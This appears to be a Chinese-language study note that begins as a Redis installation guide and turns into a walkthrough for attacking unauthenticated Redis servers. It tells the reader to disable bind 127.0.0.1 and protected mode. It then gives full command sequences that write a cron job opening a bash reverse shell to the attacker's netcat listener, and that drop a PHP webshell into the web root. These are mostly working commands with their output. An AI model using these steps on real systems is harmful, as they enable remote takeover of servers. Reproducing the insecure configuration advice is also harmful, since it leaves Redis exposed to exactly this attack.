redis安装

redis安装

参考资料
https://www.cnblogs.com/-mo-/p/11487797.html

简单安装

########################## ubuntu安装 ####################################
$sudo apt-get update
$sudo apt-get install redis-server

########################## centos安装 ####################################
wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar -xvzf redis-3.2.0.tar.gz
cd redis-3.2.0
make

######################### 启动 Redis #################################
whereis redis-server
nohup ./redis-server &

修改配置文件

vim redis.conf
bind 127.0.0.1前面加上#号
protected-mode设为no 
启动redis-server     ./src/redis-server redis-conf

redis基本命令

连接redis：
redis-cli -h 192.168.63.130

查看redis版本信息、一些具体信息、服务器版本信息等等：
192.168.63.130:6379>info

将变量x的值设为test：
192.168.63.130:6379>set x "test"

获取设置的某个变量的值：
192.168.63.130:6379>get x

`flushall`是把整个redis数据库删除，一般情况下不要用！！！
192.168.63.130:6379>flushall

查看所有键：
192.168.63.130:6379>KEYS *

获取默认的redis目录、和rdb文件名：可以在修改前先获取，然后走的时候再恢复。
192.168.63.130:6379>CONFIG GET dir
192.168.63.130:6379>CONFIG GET dbfilename

利用计划任务执行命令反弹shell

在redis以root权限运行时可以写crontab来执行命令反弹shell

先在自己的服务器上监听一个端口
nc -lvnp 7999

然后执行命令:
root@kali:~# redis-cli -h 192.168.63.130

192.168.63.130:6379> set  xx   "\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
OK

192.168.63.130:6379> config set dir /var/spool/cron/
OK

192.168.63.130:6379> config set dbfilename root
OK

192.168.63.130:6379> save
OK

往web物理路径（document root）写webshell

当redis权限不高时，并且服务器开着web服务，在redis有web目录写权限时，可以尝试往web路径写webshell。
192.168.63.130:6379> config set dir /var/www/html/
OK
192.168.63.130:6379> config set dbfilename shell.php
OK
192.168.63.130:6379> set x "<?php phpinfo();?>"
OK
192.168.63.130:6379> save
OK